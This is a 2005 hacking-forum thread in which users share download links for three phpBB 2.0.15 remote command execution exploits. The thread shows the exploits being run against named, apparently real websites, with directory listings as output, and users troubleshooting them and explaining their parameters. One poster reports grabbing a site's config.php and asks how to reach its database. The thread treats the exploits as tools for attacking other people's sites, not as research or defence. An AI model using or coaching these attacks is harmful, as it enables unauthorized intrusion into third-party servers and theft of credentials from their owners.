Waraxe IT Security Portal
Login or Register
November 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 63
Members: 0
Total: 63
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Exploits Phpbb 2.0.15 All Working...
Post new topicReply to topic View previous topic :: View next topic
Exploits Phpbb 2.0.15 All Working...
PostPosted: Thu Jun 30, 2005 6:56 pm Reply with quote
xgndx
Beginner
Beginner
Joined: Jun 30, 2005
Posts: 1




(PERL)

** phpBB 2.0.15 RCE exploit by pLuToNiUm 29/6/05**

Download : http://planet.nana.co.il/sustar/2015.txt


--- je.pl www.itwork.com /phpbb/ 625 ls
=== COMMAND: =[ ls ]= ===
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
admin
cache
common.php
config.php
db
docs
extension.inc
faq.php
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp.php
posting.php
privmsg.php
profile.php
search.php
templates
viewforum.php
viewonline.php
viewtopic.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(PHYTON)

**** phpBB 2.0.15 RCE eXploit 2005 by rattle@awarenetwork.org ****

Download : http://www.milw0rm.com/id.php?id=1076


--- lol.py http://www.itwork /phpbb/ 625

phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.

[www.cayosantamaria.info]$ ls
admin
cache
common.php
config.php
db
docs
extension.inc
faq.php
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp.php
posting.php
privmsg.php
profile.php
search.php
templates
viewforum.php
viewonline.php
viewtopic.php
[www.cayosantamaria.info]$


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(PERL)

**** Phpbb 2.0.15 RCE eXploit 2005 by dab@digitalsec.net ****

Download : http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl


--- php.pl http://www.cayosantamaria.info/phpbb/viewtopic.php?t=625
www.cayosantamaria.info - 80 - phpbb/viewtopic.php?t=625
phpbb> ls

6
admin
6
cache
b
common.php
b
config.php
3
db
5
docs
e
extension.inc
8
faq.php
c
groupcp.php
7
images
9
includes
a
index.php
9
language
a
login.php
f
memberlist.php
a
modcp.php
c
posting.php
c
privmsg.php
c
profile.php
b
search.php
a
templates
e
viewforum.php
f
viewonline.php
e
viewtopic.php
f

phpbb>
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 11:11 pm Reply with quote
diaga
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22




Can someone help me out.. not working for me

---
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\me>cd c:\

C:\>php.pl http://site.org/board/viewtopic.php?t=42
C:\php.pl <viewtopic url>

C:\>php.pl http://site.org - 42 - board/viewtopic.php?t=42
C:\php.pl <viewtopic url>

C:\>lol.py http://www.site.org /board/ 42

phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.
Usage: C:\lol.py <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.


C:\>je.pl www.site.org /board/ 42 ls
[+++++++++++++++++++++++++++++++++++++++++++++++++++++++]

how to use:

2015.pl www.phpbb.com /forum/ 1337 "ls -al"
parameters:
[URL] - server URL e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls
[]+++++++++++++++++++++++++++++++++++++++++++++++++++++[]

C:\>
---

none of them work for me (i replaced site.org). I even tried using the example commands and still get the same message

thanks
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 9:09 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




What I do when Im in that situation is use Cygwin for Win32..... Its a Linux emulator that runs on Windows its a very neat program if you download all the packages its great. All you have to do to run perl scripts is copy the .pl file to the main DIR in c:\cygwin and then enter Username@computer ~ > ./file.pl
and it works.

Also you can compile linux C and C++ scripts under windows though they are compiled into .exe 's but you can use them while using cygwin.dll

Code:
http://cygwin.com/

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 9:45 am Reply with quote
diaga
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22




Diaga@Me ~
$ ls
2015.pl je.pl php.pl

Diaga@Me ~
$ ./je.pl
: bad interpreter: No such file or directory

Diaga@Me ~
$
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 9:47 am Reply with quote
31337
Beginner
Beginner
Joined: Jul 01, 2005
Posts: 3




hello
I got the contents of config.php in a site. But i am stuck as the mysqld allows connection only from localhost. Anyone have any creative idea? pls
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 9:49 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




I got one of the 3 working this morning...

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 10:16 am Reply with quote
howitzer
Regular user
Regular user
Joined: Jun 25, 2005
Posts: 23




The last one perl works for me .. but when i input the ls command doesnt show anything...
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 12:10 pm Reply with quote
31337
Beginner
Beginner
Joined: Jul 01, 2005
Posts: 3




another question how to find the number of topics in a forum?
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 10:19 pm Reply with quote
g30rg3_x
Active user
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




if you have a url like:

www.itwork.com/forum/viewtopic.php?t=6

the url is: www.itwork.com
the directory is: /forum/
the number of existing topic is: 6

so the value of "t" variable in viewtopic is the number of existing topic..

regards
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
2015.txt is working for me
PostPosted: Fri Jul 08, 2005 5:34 am Reply with quote
HHT
Beginner
Beginner
Joined: Apr 09, 2005
Posts: 2




Yes. it is working for me

C:\>2015.pl target.url /forum/ 11 "ls"
=== COMMAND: =[ ls ]= ===
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
admin
cache
common.php
common.php.orig
config.php
db
extension.inc
faq.php
faq.php.orig
groupcp.php
groupcp.php.orig
groupcp.php.rej
images
includes
index.php
index.php.orig
index.php.rej
i.php
language
login.php
login.php.orig
login.php.rej
memberlist.php
memberlist.php.orig
memberlist.php.rej
modcp.php
......
View user's profile Send private message
Exploits Phpbb 2.0.15 All Working...
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds